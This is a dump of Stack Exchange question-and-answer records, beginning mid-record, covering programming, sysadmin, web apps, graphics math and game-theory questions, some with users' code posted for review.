the standard library functions tarfile.open, lzma.open, plistlib.readPlist.)Why are BaseDictionary.name and BaseDictionary.is_public abstract properties? Why do you require subclasses to override these properties?What is the purpose of the is_public property? It doesn't seem to be used. |
_codereview.77792 | How to optimize this merge sort code to make it run faster? And how to call merge_sort function without user input by declaring necessary array in the code? #include <iostream> using namespace std;int a[50];void merge(int,int,int);void merge_sort(int low,int high){int mid;if(low<high){ mid = low + (high-low)/2; //This avoids overflow when low, high are too large merge_sort(low,mid); merge_sort(mid+1,high); merge(low,mid,high); }}void merge(int low,int mid,int high){ int h,i,j,b[50],k; h=low; i=low; j=mid+1; while((h<=mid)&&(j<=high)) { if(a[h]<=a[j]) { b[i]=a[h]; h++; } else { b[i]=a[j]; j++; } i++; } if(h>mid) { for(k=j;k<=high;k++) { b[i]=a[k]; i++; } } else { for(k=h;k<=mid;k++) { b[i]=a[k]; i++; } } for(k=low;k<=high;k++) a[k]=b[k];}int main() { int num,i; cout<< MERGE SORT PROGRAM<<endl; cout<<endl<<endl; cout<<Please Enter THE NUMBER OF ELEMENTS you want to sort [THEN PRESSENTER]: <<endl; cin>>num; cout<<endl; cout<<Now, Please Enter the ( << num << ) numbers (ELEMENTS) [THEN PRESS ENTER]:<<endl; for(i=1;i<=num;i++) { cin>>a[i] ; } merge_sort(1,num); cout<<endl; cout<<So, the sorted list (using MERGE SORT) will be :<<endl; cout<<endl<<endl; for(i=1;i<=num;i++) cout<<a[i]<< ;cout<<endl<<endl<<endl<<endl;return 1;} | Merge sort optimization and improvement | c++;optimization;algorithm;mergesort | null |
_webapps.41474 | I have a Google Spreadsheet that has 6 or 7 columns that are all related. I would like to group them all under one header, to show this relation. Each column would additionally have its own additional header (C1, C2, C3...) For example,========================================== Group Name |========================================== C1 | C2 | C3 | C4 | C5 | C6 | C7 | ========================================== | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Is there a way to do this? | Grouping Columns in Google Spreadsheets | google spreadsheets | null |
_softwareengineering.164353 | What's the difference between overloading a method and overriding it in Java?Is there a difference in method signature, access specifier, return type, etc.? | What's the difference between overloading a method and overriding it in Java? | java;object oriented | null |
_webmaster.23404 | I'm working on a site that has a search facility with multiple parameters that look up property listings. The possible parameters are:City, Area, Building Type, Min. Bedrooms, Max Rental Price, Page Number, Sort Order.The 'raw' url, without any rewriting would look something like this:www.mysite.com/city=1&area=1&type=1&bedrooms=3&price=1000&page=3&sort=1While you're using my site, it doesn't matter to me or to you what the URL looks like, so I think I'm happy to work with the so called 'dirty' URL.It matters however, what Googlebot sees, so i'm planning to add a URL rewrite to allow access to pages like:www.mysite.com/london/kensington/apartmentsAnd then i'm planning to add canonicals to make sure that's the page that gets indexed - no matter what your bedroom / price preferences are, what page of results you're on or the order in which you want them to appear. The idea is that Google will only index fewer, higher quality 'view-all' pages, but users will be able to drill down and refine their results to get very specific.The question however is whether or not this is a correct use of the canonical and whether it will lead to the desired effect?EDITIt doesn't matter if google indexes 'dirty' URLs with parameters (though it should index the clean one when theres one available). What really matters is that the site gets found when people conduct a relevant search. Having it above competitor sites is the idea, if they didn't have an SEO strategy. | Having google index canonicals but users using parameters - correct? | seo;google search;url rewriting;canonical url | Canonical URLs are to be used when two different URLs can be used to pull up the same content. If your URL rewriting causes this to happen then canonical URLs will be necessary.So if:www.mysite.com/london/kensington/apartmentspulls up the same content aswww.mysite.com/city=london&area=kensington&typeapartments then you need canonical URLs(That second example may not make sense but hopefully you get the idea).UPDATEIf the only difference between two pages is the sort order of a metric or something similar you will need to use canonical URLs for those pages. |
_unix.88943 | By reading the GNU coreutils man page for rm, one of the options is -f, which according to the manual,-f, --force ignore nonexistent files and arguments, never promptNow, I made some tests and show that indeed if I use something likerm -f /nonexisting/directory/it won't complain.What can someone really gain from such an option?Plus the most common examples of deleting directories using rm is somethinglike rm -rf /delete/this/dirThe -r option makes sense, but -f? | What's the real point of the -f option on rm? | rm;options;coreutils | I find that the man page lacks a little detail in this case. The -f option of rm actually has quite a few use cases:To avoid an error exit codeTo avoid being promptedTo bypass permission checksYou are right that it's pointless to remove a non-existent file, but in scripts it's really convenient to be able to say I don't want these files, delete them if you find them, but don't bother me if they don't exist. Some people use the set -e in their script so that it will stop on any error (to avoid any further damage the script can cause), and rm -rf /home/my/garbage is easier than if [[ -f /home/my/garbage ]]; then rm -r /home/my/garbage; fi.A note about permission checks: to delete a file, you need write permission to the parent directory, not the file itself. So let's say somehow there is a file owned by root in your home directory and you don't have sudo access, you can still remove the file using the -f option. If you use Git you can see that Git doesn't leave the write permission on the object files that it creates:-r--r--r-- 1 phunehehe phunehehe 62 Aug 31 15:08 testdir/.git/objects/7e/70e8a2a874283163c63d61900b8ba173e5a83cSo if you use rm, the only way to delete a Git repository without using root is to use rm -rf. |
_webapps.70199 | What is the correct syntax for the URL (see also a related question about documentation) to view a Google Visualization API Query result as a web page containing the tabulated results of the query? Directly in the question subject line implies these constraints:From the URL only, and,Not requiring separate special web pages that read that Javascript output and reformulate it, and,Not requiring manual cut and paste operations, andNot requiring a bridge through a Google document that has to be created (since I want just a direct URL to render the page),My failed attempt: My query is of the form (key value CENSORED):http://spreadsheets.google.com/a/google.com/tq?key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'Browsing to that page dumps out the result as one long Javascript call containing JSON encoded info. Useful for programmers I bet, but not for direct viewing of a query result just by browsing to the query URL.Tacking on a &output=html:http://spreadsheets.google.com/a/google.com/tq?key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'&output=htmlDoes not change the output. Obviously output=html is not recognized or is ignored (guessing the syntax from Google Spreadsheets URL Syntax and Display Options?). This should be documented but I could not find it (hence another related question) | How to directly view a Google Visualization API Query URL as a human-readable table or web page? | google spreadsheets | Try this: addition for html output in bold.http://spreadsheets.google.com/a/google.com/tq?tqx=out:html&tq=key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'or the way google usually rearranges it:http://docs.google.com/spreadsheets/d/CENSORED/tq?tqx=out:html&tq=key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something' |
_codereview.121899 | I'm trying to make my QuickSort faster than it is and I have got no more ideas about how to make it more efficient for all types of arrays but mostly very big arrays. It uses random to create the Pivot and it uses InsertionSort when the array is less than 15 elements. What do you think guys?I appreciate for any help here to make the code run faster.public class QuickSort private static Random rand = new Random(); public void sort(int[] v){ QuickSort(v, 0, v.length-1); } private void QuickSort (int[] v, int first, int last) { if (first >= last) return; else { if (last - first < 15) { InsertionSort(v, first, last); return; } int[] pivotLoc = partitionArray(v, first, last, makePivot(v,first,last)); QuickSort(v, first, pivotLoc[1]); QuickSort(v, pivotLoc[0], last); } } private int[] partitionArray (int[] v, int first, int last, int pivot) { while(last => first) { while(v[first] < pivot) first++; while(v[last] > pivot) last--; if (first > last) break; swap(v, first, last); first++; last--; } return new int[] {first, last}; } private void swap(int[] v, int first, int last) { int temp = v[first]; v[first] = v[last]; v[last] = temp; } public void InsertionSort(int[] v, int first, int last) { int temp; for (int i=first + 1; i <= last; i++) { int j = i; while (j > 0 && v[j-1] > (v[j]) ) { temp = v[j]; v[j] = v[j-1]; v[j-1] = temp; j--; } } } private int makePivot (int[] v, int first, int last){ return v[rand.nextInt(last-first+1)+first]; }} | Faster QuickSort | java;sorting;quick sort;insertion sort | null |
_cstheory.12833 | The problem statement isGiven convex functions $f_i$ over $X$, find $$\arg\max_{x\in X} \sum_i f_i(x)$$Does this kind of problem structure allow one to use specific strategies to solve the problem?Does it help if I also know the lower bound and upper bound of each $\max_x f_i(x)$ and the corresponding $x$?For example, is there any algorithm like the objective function analogy of branch and bound method ? | Maximizing a convex function where the objective function is separable but the search space is not | ds.algorithms;approximation algorithms;optimization;convex optimization;approximation | null |
_unix.75734 | I have a bunch of web sites that I develop, and I run an Apache server locally to do debugging and design. The web sites use Apache, PHP, and MySQL. To be clear, my Apache server is not serving these sites to the internet, I just access them locally.I develop on two machines. One desktop, and one laptop. Both are running Linux Mint, and I try to keep the settings consistent between them. This means I have to duplicate the Apache and PHP configurations. I keep the directory structures the same. I have to make sure to copy the MySQL databases from one machine to the other if I make changes.Which is not ideal. It's prone to human error, especially with keeping the MySQL databases synched. Sometimes I work on one on one machine, forget to export and import the databases, and then after I've done work on the other machine, I have two versions and I can't easily merge them. Also, it's a hassle for making backups.What does work is that I store all my HTML, CSS, and Javascript in a folder in my Dropbox directory. So any changes I make to those files are automatically syncronized. It also means I have a backup in the cloud. Should the need arise, to restore these files if I ever move to a new machine, I just have to install Dropbox and all the files are recovered.The most I have to do if setting up on a new computer is create a symlink to my Dropbox directory where my HTML files are stored:sudo ln -s /home/dave/Dropbox/Websites /var/www/WebsitesIs there a way I can do this with my Apache settings and MySQL databases as well? Where I can keep them synchronized across both machines in my Dropbox folder, and have a miminum of set up if I go to a new machine? | Is it not possible to store my local websites in my Dropbox folder? | apache httpd;mysql;dropbox | null |
_unix.371421 | I have a question, how do I move my /dev/mapper/datos-datos_lv so I can use that space on /? I want to use the space from /dev/mapper/datos on the/` filesystem.df -hFilesystem Size Used Avail Use% Mounted on/dev/sda1 92G 5.8G 82G 7% /devtmpfs 1.9G 0 1.9G 0% /devtmpfs 1.9G 140K 1.9G 1% /dev/shmtmpfs 1.9G 41M 1.9G 3% /runtmpfs 1.9G 0 1.9G 0% /sys/fs/cgroup/dev/mapper/datos 296GB 63M 281G 1% /opttmpfs 379M 28K 379M 1% /run/user/1000What I want to achieve is:df -hFilesystem Size Used Avail Use% Mounted on/dev/sda1 388G 5.8G 82G 7% /devtmpfs 1.9G 0 1.9G 0% /devtmpfs 1.9G 140K 1.9G 1% /dev/shmtmpfs 1.9G 41M 1.9G 3% /runtmpfs 1.9G 0 1.9G 0% /sys/fs/cgrouptmpfs 379M 28K 379M 1% /run/user/1000Is there any way to get 388G on /? | Merge two partitions | linux;filesystems;partition;lvm | null |
_cs.23541 | In an article I am currently reading the grammarS SS | a | is being described as canonical infinitely ambiguous. The infinitely ambiguous part I have no problem recognizing, but does canonical mean? Does it mean typical, standard example etc.? | Canonical infinitely ambiguous languages | formal languages;terminology | I think your understanding the use of canonical here as standard example is correct; similarly, grammars for parenthesis matching or palindromes are canonical examples for context-free grammars, generally. |
_computerscience.4662 | So I've been messing with perspective projection matrices recently. I used numpy and GTK/Cairo to make a very small Python renderer. I'm very confused with the results I'm getting though.I took this Homogeneous Coordinates technique from an online lecture. If I understood correctly, the objective is to transform every point inside a Viewing Pyramid that's frustum shaped so they fit in a cube. (Image from of songho.ca) You need a Field of View angle ($\alpha$), the Near and Far plane distances ($n$ and $f$ respectively), and the aspect ratio ($r$). Firstly you turn every 3D Point into a Homogeneous Point by adding a 1 like so:\begin{align*}\begin{pmatrix} x & y & z\end{pmatrix}\xrightarrow{\text{4D}}\begin{bmatrix} x & y & z & 1\end{bmatrix}\end{align*}Then you multiply your point matrix by a perspective projection matrix:\begin{align*}\begin{bmatrix}x & y &z & 1 \end{bmatrix}\begin{bmatrix} 1\over\tan(\alpha/2) & 0 & 0 & 0\\ 0 & r\over\tan(\alpha/2) & 0 & 0\\ 0 & 0 & (f+n)\over(f-n) & -1 \\ 0 & 0 & (2nf)\over(f-n) & 0\end{bmatrix}=\begin{bmatrix}x' & y' & z' & w\end{bmatrix}\end{align*}And to go back to a 3D point in space you divide by the fourth dimension:\begin{align*}\begin{bmatrix} x' & y' & z' & w\end{bmatrix}\xrightarrow{\text{3D}}\begin{pmatrix} x' \over w & y' \over w & z' \over w\end{pmatrix}\end{align*}This is exactly what I've done with numpy:def projection_matrix(fov, aspect, near, far): t = 1/math.tan(math.radians(fov)/2) a = (far + near)/(far - near) b = (2*near*far)/(far-near) r = aspect return numpy.matrix([[t, 0, 0, 0], [0, r*t, 0, 0], [0, 0, a, -1], [0, 0, b, 0]])But for some reason the renderer is totally messed up. This is supposed to be a spinning cube... What am I missing here? | My perspective projection is messed up? | rendering;projections;camera matrix | The math for the projection matrix is (with fov as $\alpha$):$q \leftarrow \frac{1}{tan(\frac{\alpha}{2})}$$a \leftarrow \frac{q}{aspect}$$b \leftarrow \frac{(far + near)}{(near - far)}$$c \leftarrow \frac{(2 * far * near)}{(near - far)}$Notice that there're some things you're doing that are differently, such as the order of your subtractions between near and far, how you organize the matrix values, and your multiplication between your r * t.Using the variables above, the column-major matrix below would be the resulting perspective projection matrix:\begin{bmatrix} a & 0 & 0 & 0 \\ 0 & q & 0 & 0 \\ 0 & 0 & b & c \\ 0 & 0 & -1 & 0\end{bmatrix}From the above, we get:def perspective_projection_matrix(fov, aspect, near, far): q = 1 / tan(radians(fov * 0.5)) a = q / aspect b = (far + near) / (near - far) c = (2*near*far) / (near - far) # construct column-major matrix here...NOTE: I left the last part out because I'm not familiar enough with numpy to know whether it expects row-major or column-major order.Also, you should validate all your arguments (e.g. both near > 0 and far > 0, far > near, etc.) if you want to avoid future headaches. |
_unix.296941 | In my user, which has admin privileges, I have several languages enabled, and English (U.S.) is the 'Primary' language:After updating to El Capitan (10.11), I get mixed languages in bash:$ svn upUpdating '.': [English]P revisjon 3096. [Norwegian]$ lkbash: lk: [Russian]$Each message is reliably the same language every time. Command not found is always in Russian, On revision #### is always in Norwegian, etc. I know these languages, so this isn't impacting my productivity, but what the dad gum is going on?!$ localeLANG=LC_COLLATE=CLC_CTYPE=UTF-8LC_MESSAGES=CLC_MONETARY=CLC_NUMERIC=CLC_TIME=CLC_ALL= | Mixed languages in bash after OS X update to El Capitan | bash;locale | null |
_unix.388275 | I would like to disable password login for a user. But instead of the error message (Public key) I would not like the user notice that the password login is disabled and prompting him for password.So far I know I can disable password login for all users except one withPasswordAuthentication noMatch User totoPasswordAuthentication yesBut attempting to login as 'not_toto' will result an error message from the server, which I do not wish.Do I need to modify openssh sources to do that? Or is there a configuration option which can do the job?Edit:Having two ssh servers running is an option, so killing connections with iptables or via another method (outside ssh configuration) could do it.Edit 2:I want to do this as I need two ssh instances, one in the official door to get in and the other is a honeypot. So the bots will give their password but never letting them in. (nb: this is a personal project I am the only one using the server and not logging colleagues passwords nor other nasty things, I just want to make some stats on bots)The first ssh server (say official) is OpenSSH_7.4p1 Debian-10+deb9u1, OpenSSL 1.0.2l 25 May 2017, installed with Debian packages.The 'honeypot' is a modified version of Openssh-7.4p1 that logs username and passwords from login attempts.Actually PAM should be enabled on this one but I will double check it. Maybe your option symcbean may be the right one. | SSH: disable password login for root but leaving the prompt | ssh;openssh | null |
_codereview.78966 | Following is the code I am using to find a separate count for alphabets and numeric characters in a given alphanumeric string: Public Sub alphaNumeric(ByVal input As String) 'alphaNumeric(asd23fdg4556g67gh678zxc3xxx) 'input.Count(Char.IsLetterOrDigit) Dim alphaCount As Integer = 0 '<-- initialize alphabet counter Dim numericCount As Integer = 0 '<-- initialize numeric counter For Each c As Char In input '<-- iterate through each character in the input If IsNumeric(c) = True Then numericCount += 1 '<--- check whether c is numeric? if then increment nunericCounter If Char.IsLetter(c) = True Then alphaCount += 1 '<--- check whether c is letter? if then increment alphaCount Next MsgBox(Number of alphabets : & alphaCount) '<-- display the result MsgBox(Number of numerics : & numericCount) End SubEverything works fine for me. Let me know how I can make this simpler. | Get alpha numeric count from a string | strings;vb.net | In general your code looks good, here are a few smaller remarks.Method name:Capitalize the name of your method and make it more meaningful. Use CountAlphaNumeric or something similar.Comments in code:You can omit the comments in your code. It speaks for itself what the code is doing, certainly because you use clear names for your variables.IsNumeric() - Char.IsDigit():In the .NET framework, there's the Char.IsDigit method, use this one instead:If Char.IsDigit(c) = True Then numericCount += 1MsgBox() - MessageBox.Show():Although MsgBox is valid, it also comes from the VB era. In the .NET framework there's the MessageBox.Show method, use that one instead:MessageBox.Show(Number of alphabets : & alphaCount)String.Format():To insert variables in a string, use the String.Format instead of just concatenating the values:Dim result As String = String.Format(Number of alphabets : {0}, alphaCount)Expression = True:You can leave out the = True part in your if conditions, since the methods return a boolean value.This is what the code now looks like:Public Sub CountAlphaNumeric(ByVal input As String) Dim alphaCount As Integer = 0 Dim numericCount As Integer = 0 For Each c As Char In input If Char.IsDigit(c) Then numericCount += 1 If Char.IsLetter(c) Then alphaCount += 1 Next MessageBox.Show(String.Format(Number of alphabets : {0}, alphaCount)) MessageBox.Show(String.Format(Number of numerics : {0}, numericCount)End SubUsing LinQ:Although not always the best option, you can achieve the same result using LinQ, using the Enumerable.Count method:Dim alphaCount = input.Count(Function(c) Char.IsLetter(c))Dim numericCount = input.Count(Function(c) Char.IsDigit(c))Here's the complete code using LinQ:Public Sub CountAlphaNumericUsingLinQ(ByVal input As String) Dim alphaCount = input.Count(Function(c) Char.IsLetter(c)) Dim numericCount = input.Count(Function(c) Char.IsDigit(c)) MessageBox.Show(String.Format(Number of alphabets : {0}, alphaCount)) MessageBox.Show(String.Format(Number of numerics : {0}, numericCount))End Sub |
_webapps.45449 | I want to leave feedback for an item I bought on eBay that was listed as a classified, but I can't even find the item in My eBay.Is it not possible to leave feedback for classifieds? | Can I leave feedback for classified item on eBay? | ebay | No you can't.From the Different ways of buying help article:When you see a Classified Ad listing, it means that you deal directly with the seller and buy the item at a fixed price. Because your Classified Ad purchase is outside of eBay, you won't be able to use eBay Feedback or eBay Buyer Protection. |
_cs.27915 | My question is the following: How to calculate the regret in practice?I am trying to implement the regret matching algorithm but I do not understand how to do it.First, I have $n$ players with the joint action space $\mathcal{A}=\{a_0, a_1,\cdots,a_m\}^n.$Then, I fix some period $T$. The action set $A^t\in\mathcal{A}$ is the action set chosen by players at time $t$. After the period $T$ (every player has chosen an action). So I get $u_i(A^t)$.Now the regret of player $i$ of not playing action $a_i$ in the past is: (here $A^t\oplus a_i$ denotes the strategy set obtained if player $i$ changed its strategy from $a'_i$ to $a_i$)$$\max\limits_{a_i\in A_i}\left\{\dfrac{1}{T}\sum_{t\leqslant T}\left(u_i(A^t\oplus a_i )-u_i(A^t)\right)\right\}.$$I do not understand how to calculate this summation. Why there is a max over the action $a_i\in A_i$? Should I calculate the regret of all actions in $A_i$ and calculate the maximum? Also, In Hart's paper, the maximum is $\max\{R, 0\}$. Why is there such a difference? I mean if the regret was: $\dfrac{1}{T}\sum_{t\leqslant T}\left(u_i(A^t\oplus a_i )-u_i(A^t)\right),$the calculation would be easy for me.The regret is defined in the following two papers [1] (see page 4, equation (2.1c)) and [2] (see page 3, section I, subsection B).A simple adaptive procedure leading to correlated equilibrium by S. Hart et al (2000)Distributed algorithms for approximating wireless network capacity by Michael Dinitz (2010)I would like to get some helps from you. Any suggestions step by step how to implement such an algorithm please? | How to implement the regret matching algorithm? | machine learning;game theory;learning theory | The index set of the max operation is $A_i$, the actions of player $i$. The formula says: take each such action $a_i \in A_i$ and compute its regret (with the sub-formula you say you can implement easily), and then take the maximum of those regrets. The reason for the $\max(R,0)$ is that actions with negative regrets are performing worse than the action currently chosen.To implement this in code, just set a temporary variable $t$ to be 0. Now loop through the actions one by one, and for each action $a$, compute its regret $r$, and set $t$ as $\max(r,t)$. Note that this approach includes the $\max(R,0)$ operation; to do this without that, set $t$ initially to $-\infty$. |
_codereview.54018 | I wanted to create a cart that I can easily add some item or simply help someone at the other end over the phone. I decided to create a cart that would store everything on MySQL instead of using $_SESSION.I did not code the whole cart just in case that this idea is very very bad. But I wanted to show what I have done and know your feedback.The MySQL table look like the following:CREATE TABLE IF NOT EXISTS `checkouts` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `SessionId` varchar(30) NOT NULL, `LastTouchTime` int(11) NOT NULL, `ObjectSerialized` text NOT NULL, PRIMARY KEY (`Id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=0 ;And this is the PHP class:class Checkout{ static $KeepCartFor = 86400; static $dbCon = null; private $CheckoutId = null; private $Cart = array(); private $PromoCode = null; private $SubTotal = 0.00; // Please Note that im using GST as the rst ( the cart is kinda made for easy swap between canada store and usa private $Gst = 0.00; //Good And Services Taxes private $Pst = 0.00; //Provincial Tax private $Shipping = array(Method=>null,Cost=>0.00); private $Total = 0.00; private $Customer = array(FirstName=>null,LastName=>null,Email=>null,Home=>null,Work=>null,Cell=>null,Fax=>null,Company=>null,Address1=>null,Address2=>null,Address3=>null,Country=>null,State=>null,City=>null,Zip=>null,isShippingSameAsBilling=>true,ShipFirstName=>null,ShipLastName=>null,ShipCompany=>null,ShipAddress1=>null,ShipAddress2=>null,ShipAddress3=>null,ShipCountry=>null,ShipState=>null,ShipCity=>null,ShipZip=>null); public function Cart_AddItem($WebsiteId,$Qty = 1) { if(!isset($this->Cart[$WebsiteId])) { $this->Cart[$WebsiteId] = $this->_GetProductDetail($WebsiteId); $this->Cart[$WebsiteId]['Qty'] = $Qty; } else $this->Cart[$WebsiteId]['Qty'] += $Qty; $this->Shipping = array(Method=>null,Cost=>0.00); } public function Cart_RemoveItem($WebsiteId,$Qty = null) { if(isset($this->Cart[$WebsiteId])) if(is_null($Qty)) unset($this->Cart[$WebsiteId]); else { if($this->Cart[$WebsiteId]['Qty'] - $Qty <= 0) unset($this->Cart[$WebsiteId]); else $this -> Cart[$WebsiteId]['Qty'] -= $Qty; } $this->Shipping = array(Method=>null,Cost=>0.00); } public function Cart_Emtpy() { $this -> Cart = array(); $this -> SubTotal = 0.0; $this -> Gst = 0.00; $this -> Pst = 0.00; $this -> Total = 0.00; } public function Cart_GetItems($WithDetail = false) { if(!$WithDetail) { foreach($this->Cart as $WebsiteId => $Vars) { $Return[$WebsiteId] = $Vars['Qty']; } return $Return; } else return $this->Cart; } private function _RefrechCartVars() { $this->SubTotal = 0.00; $this->Gst = 0.00; $this->Pst = 0.00; $this->Total = 0.00; foreach($this->Cart as $WebsiteId => $Vars) { $this->SubTotal += $Vars['ActualPrice']*$Vars['Qty']; } if(($this->Customer['isShippingSameAsBilling']?$this->Customer['Country']:$this->Customer['ShipCountry']) == United States) if(($this->Customer['isShippingSameAsBilling']?$this->Customer['State']:$this->Customer['ShipState']) == New York) $this->Gst = ($this->SubTotal * 0.07) + (is_null($this->Shipping['Method'])?0.00:$this->Shipping['Cost']); $this->Total = $this->SubTotal + $this->Gst + (is_null($this->Shipping['Method'])?0.00:$this->Shipping['Cost']); } private function _GetProductDetail($WebsiteId) { $GetProductDetail = Checkout::$dbCon -> prepare(SELECT * FROM product WHERE id = :Id); $GetProductDetail -> bindValue(':Id',$WebsiteId); try{ $GetProductDetail->execute(); }catch(PDOException $e) {die(Error Getting Product Detail :.$e->getMessage());} $PD = $GetProductDetail->fetch(PDO::FETCH_ASSOC); $Return['Brand'] = $PD['brand']; $Return['ModelNumber'] = $PD['SKU']; $Return['Title'] = $PD['title']; $Return['ActualPrice'] = ($PD['pricingtype'] =='promo' && strtotime($PD['enddate']) >= time()?$PD['promoprice']:$PD['price']); $Return['MSRP'] = $PD['originalprice']; $Return['PictureUrl'] = $PD['picturelink']; $Return['Weight'] = $PD['weight']; $Return['DimensionalWeight'] = number_format($PD['height']*$PD['length']*$PD['width']/166,2); $Return['CalculatedWeight'] = ($Return['Weight']>=$Return['DimensionalWeight']?$Return['Weight']:$Return['DimensionalWeight']); return $Return; } public function __construct() {// Check if have an checkout already $Prepare = Checkout::$dbCon ->prepare(SELECT * FROM checkouts WHERE SessionId = :SessionId AND LastTouchTime >= :Time ORDER BY Id DESC); $Prepare -> bindValue(':SessionId',session_id()); $Prepare -> bindValue(':Time',time()-self::$KeepCartFor); try{ $Prepare -> execute(); if($Prepare -> rowCount() != 0) { $Checkout = $Prepare->fetch(PDO::FETCH_ASSOC); $this->CheckoutId = $Checkout['Id']; $ThisVar = unserialize($Checkout['ObjectSerialized']); foreach($ThisVar as $Key => $Val) $this->$Key = $Val; $this->CheckoutId = $Checkout['Id']; } }catch(PDOException $e) { die(Error Getting Checkout From Db: .$e->getMessage()); } } public function __destruct() { if(is_null($this->CheckoutId)) {// Insert Checkout In Mysql $CheckWhatIsNextId = Checkout::$dbCon->prepare(SELECT Id FROM checkouts ORDER BY Id DESC LIMIT 0,1); $CheckWhatIsNextId -> execute(); $NextId = $CheckWhatIsNextId -> fetch(PDO::FETCH_ASSOC); $this->CheckoutId = $NextId['Id']; $InsertCheckout = Checkout::$dbCon->prepare(INSERT INTO checkouts (`SessionId`,`LastTouchTime`,`ObjectSerialized`) VALUES(:SessionId,:LastTouchTime,:ObjectSer);); $InsertCheckout -> bindValue(':SessionId',session_id()); $InsertCheckout -> bindValue(':LastTouchTime',time()); $InsertCheckout -> bindValue(':ObjectSer',serialize($this)); try{ $InsertCheckout -> execute(); }catch(PDOException $e) { die(Error SavingCart In Db: .$e->getMessage()); } } else { $UpdateCheckout = Checkout::$dbCon->prepare(UPDATE `checkouts` SET `LastTouchTime` = :Time,ObjectSerialized = :Object WHERE `Id` = :Id;); $UpdateCheckout -> bindValue(':Time',time()); $UpdateCheckout -> bindValue(':Object',serialize($this)); $UpdateCheckout -> bindValue(':Id',$this->CheckoutId); try{ $UpdateCheckout -> execute(); }catch(PDOException $e) { die(Error SavingCart In Db: .$e->getMessage()); } } }}And this next class is simply a little class for my laziness of remembering the DSN of MySQL and port and all for PDO objects:class dbCon extends PDO{ public function __construct($host,$port,$user,$pass,$dbName=null) { $pdo_options[PDO::ATTR_ERRMODE] = PDO::ERRMODE_EXCEPTION; $dsn = 'mysql:host='.$host.';port='.$port.';'; if(!is_null($dbName)) $dsn .='dbname='.$dbName; try{ parent::__construct($dsn,$user,$pass,$pdo_options); }catch(PDOException $e){ die(Error Connecting To Database: .$e->getMessage() ); } }}Technically on any page I can access the cart with only 2 line of code:Checkout::$dbCon = new dbCon(127.0.0.1,3306,UserName,Password,DatabaseName);$Checkout = new Checkout();Maybe there is some security issue that I'm not thinking about, or perhaps I should do something different. Let me know what you think. | A cart that uses SessionID | php;mysql | DatabaseNormalize your database! Don't keep a string of serialized objects in the database, that's extremely brittle and extremely not helpful in all but the most simple cases. Instead, you should have 3 tables (two of which you already have):items - Table that holds information about items, includes name, price, etc.Key column: item_id.carts (renamed from checkout) - Table that holds information about user's carts. There's a 1:1 relationship between carts and checkouts, a single cart can't be checked out more than once, and a single checkout doesn't apply to multiple carts. So it makes sense to have them in the same table. Has the cart's ID, the user's ID (in your case, SessionID) and extra information (not items) like LastTouchTime.Key column: cart_iditems-in-carts. Items and carts have a many to many relationship, also known as n:m ratio. One cart can have multiple items in it, and the same item can be in multiple carts. So we have a third table that ties the two together. All the table has is two columns: item_id, cart_id. Here's an example for a many-to-many architecture.PHPNaming convention - ClassNames should be CamelCaps, $variableNames and methodNames() should be lowercase camelCase. Don't mix caps with underscores (for example, Cart_AddItem should be just addItem, it clear we're talking about the cart here, isn't it?)Use of static variables and methods - Don't. Static variables and methods are global, which means that by definition they make your application less stable, harder to test and maintain, and harder to read. Please don't.__construct() function should always be first - The first thing I read about a class is how it's constructed. Implicit dependencies - Your __construct() says it doesn't need any parameters, but that's a lie. It actually needs a database connection, and you're using a global to get it. That's what I mean by don't use static variables. This is a better approach:public function __construct(DBCon $dbCon) {Consistent spacing - Sometimes you use $var->method() and sometimes $var -> method() make up your mind, and stick with it. There are free tools that can do this job for you!Naming of things - Why is it called a Checkout? What I see is a Cart, and that's how it should be called. If you can checkout a cart, you should have a method $cart->checkout(...). Your methods are redundantly long, Cart_Empty() can be empty(), Cart_AddItem() can be addItem().Too much going on in once class - Your cart uses Items right? Why not make an Item class? What's the purpose of the dbCon object? - Why are you placing another abstraction on top of PDO? What problem are you solving here? On 99% of the application (and I bet including yours), you only ever need a single database connection, so what's the point of wrapping it in a class that hinders readability (I know the PDO, but I see dbCon and I have no idea what it is, until I dive in and read the code).All-in-all, I'd try to adopt a more OOP approach, create more class, increase the interaction between objects. Get rid of the globals and statics.Good luck :) |
_softwareengineering.132288 | We are using SQL Source Control 3, SQL Compare, SQL Data Compare from RedGate, Mercurial repositories, TeamCity and a set of 4 environments including production. I am working on getting us to a dedicated environment per developer, but for at least the next 6 months we are stuck with a shared model. To summarize our current system, we have a DEV SQL server where developers first make changes/additions. They commit their changes through SQL Source Control to a local hgdev repository. When they execute an hg push to the main repository, TeamCity listens for that and then (among other things) pushes hgdev repository to hgrc. Another TeamCity process listens for that and does a pull from hgrc and deploys the latest to a QA SQL Server where regression and integration tests are run. When those are passed a push from hgrc to hgprod occurs. We do a compare of hgprod to our PREPROD SQL Server and generate deployment/rollback scripts for our production release.Separate from the above we have database Hot Fixes that will need to be applied in between releases. The process there is for our Operations team make changes on the PreProd database, and then after testing, to use SQL Source Control to commit their hot fix changes to hgprod from the PREPROD database, and then do a compare from hgprod to PRODUCTION, create deployment scripts and run them on PRODUCTION.If we were in a dedicated database per developer model, we could simply automatically push hgprod back to hgdev and merge in the hot fix change (through TeamCity monitoring for hgprod checkins) and then developers would pick it up and merge it to their local repository and database periodically. However, given that with a shared model the DEV database itself is the source of all changes, this won't work. Pushing hotfixes back to hgdev will show up in SQL Source Control as being different than DEV SQL Server and therefore we need to overwrite the reposistory with the change from the DEV SQL Server. My only workaround so far is to just have OPS assign a developer the hotfix ticket with a script attached and then we run their hotfixes against DEV ourselves to merge them back in. I'm not happy with that solution. Other than working faster to get to dedicated environment, are they other ways to keep this loop going automatically? | How do I Integrate Production Database Hot Fixes into Shared Database Development model? | version control;deployment;database development | null |
_datascience.5313 | In a assignment we are given macro economic indicators like GDP, Consumer price index, Producer Price index and Industrial production index. Also we are given Crude oil, Sugar prices and FM-CG Sales. We are required to forecast future quarter sales and give a model. As I'm new to this subject, I don't know where to start with it, or what to read. Can anyone provide me with some examples of what to do, or any PDFs which might be helpful. | Forecasting sales and creating model | predictive modeling;forecast | null |
